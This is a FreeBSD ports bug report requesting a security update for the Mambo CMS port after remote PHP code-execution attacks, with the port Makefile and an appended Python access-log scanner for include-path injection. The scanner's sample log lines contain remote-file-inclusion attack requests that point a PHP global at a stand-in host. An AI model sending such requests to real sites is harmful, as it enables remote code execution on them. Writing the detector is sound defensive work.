From owner-freebsd-ports-bugs@FreeBSD.ORG Mon Nov 28 11:00:19 2005
Message-Id: <200511281057.jASAvHLZ014605@www.freebsd.org>
Date: Mon, 28 Nov 2005 10:57:17 GMT
From: Francisco Alves Cabrita
To: freebsd-gnats-submit@FreeBSD.org
Subject: ports/89665: [Security Update]: www/mambo
List-Id: Ports bug reports

>Number: 89665
>Category: ports
>Synopsis: [Security Update]: www/mambo
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: freebsd-ports-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: update
>Submitter-Id: current-users
>Arrival-Date: Mon Nov 28 11:00:16 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator: Francisco Alves Cabrita
>Release: FreeBSD 6.0-STABLE
>Organization: Núcleo Português de FreeBSD
>Environment:
FreeBSD fac.e10.pt 6.0-STABLE FreeBSD 6.0-STABLE #0: Fri Nov 25 16:42:45 WET 2005 fac@fac.e10.pt:/usr/obj/usr/src/sys/MOBILE i386
>Description:
There has been a spate of attacks on Mambo sites in the last few days. These have been serious, in that they involved running arbitrary PHP code in the site attacked. This means that the security of information may have been compromised, and back door code may have been installed. Anyone who has been attacked should take great care to ensure that their site has been thoroughly restored to a safe condition. If advice is needed, please post in the Mambo forums.

http://www.mamboserver.com/index.php?option=com_content&task=view&id=172&Itemid=1
>How-To-Repeat:
>Fix:
This patch blocks exploits that attempt to set a value for the global used to indicate where code is to be loaded. By doing this, the exploits allow arbitrary code to be loaded from a web site under the hacker's control.

Makefile:

EXTRACT_DEPENDS=	unzip:${PORTSDIR}/archivers/unzip
NO_BUILD=	yes
USE_MYSQL=	yes
USE_PHP=	mysql session zlib gd pdf xml pcre
WANT_PHP_WEB=	yes

PKGMESSAGE=	${WRKDIR}/pkg-message
SUB_FILES=	pkg-message
SUB_LIST+=	MAMBO_DIR=${MAMBO_DIR}
PLIST_SUB+=	MAMBO_DIR=${MAMBO_DIR}

MAMBO_DIR?=	www/${PORTNAME}
DIST_SUBDIR=	${PORTNAME}
MAMBO_SRC=	MamboV4.5.3-stable.tar.gz
MAMBO_PATCH1=	Mambo4523.security_fix.zip

do-extract:
	@${MKDIR} ${WRKSRC}
	@${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC}
	@${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC}
	@${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty

do-install:
	@${MKDIR} ${PREFIX}/${MAMBO_DIR}
	@cd ${WRKSRC} && \
		${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \
		-exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;
	@cd ${WRKSRC} && \
		${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \
		-exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;

post-install:
	@${CAT} ${PKGMESSAGE}

.include

distinfo:

pkg-plist:

Thanks in advance
Francisco Alves Cabrita
>Release-Note:
>Audit-Trail:
>Unformatted:
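
A log check for the request pattern the Fix text describes (a request that sets the code-location global to a remote address), as an added example that is not part of the original PR or of the Mambo patch. The parameter name cfg_path, the hosts and the log lines are constructed placeholders, and it assumes the value arrives in the query string of a combined-format access log.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request line of a combined-format access log entry.
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that would point a PHP include path at another host.
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)
# Parameter names that address PHP's global arrays directly.
GLOBAL_WRITE = re.compile(
    r'^(?:GLOBALS|_(?:GET|POST|COOKIE|REQUEST|SERVER|ENV|FILES|SESSION))(?:\[|$)',
    re.I)

def suspicious_params(log_line):
    """Return sorted (parameter, reason) pairs for one access-log line."""
    m = REQ.search(log_line)
    if not m:
        return []
    _, _, query = m.group(1).partition('?')
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value).strip()  # second decode catches double encoding
        if GLOBAL_WRITE.match(name):
            hits.add((name, "writes a PHP global array"))
        if REMOTE.match(value):
            hits.add((name, "value is a remote URL"))
    return sorted(hits)

def scan(lines):
    """Map 1-based line number -> hits, for lines with at least one hit."""
    found = {}
    for lineno, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            found[lineno] = hits
    return found

# Constructed sample entries (cfg_path is a hypothetical parameter name).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Nov/2005:10:01:02 +0000] "GET /index.php?option=com_content&task=view&id=172&Itemid=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/Nov/2005:10:02:41 +0000] "GET /index.php?GLOBALS[cfg_path]=http://files.example.test/x.txt? HTTP/1.0" 200 812',
    '203.0.113.5 - - [28/Nov/2005:10:02:44 +0000] "GET /index.php?_REQUEST%5Bcfg_path%5D=1&cfg_path=hTTp%3A%2F%2Ffiles.example.test%2Fx.txt HTTP/1.1" 200 799',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

A remote URL in a parameter can also be a legitimate return or redirect link, so treat that reason alone as a triage signal and the global-array write as the stronger one.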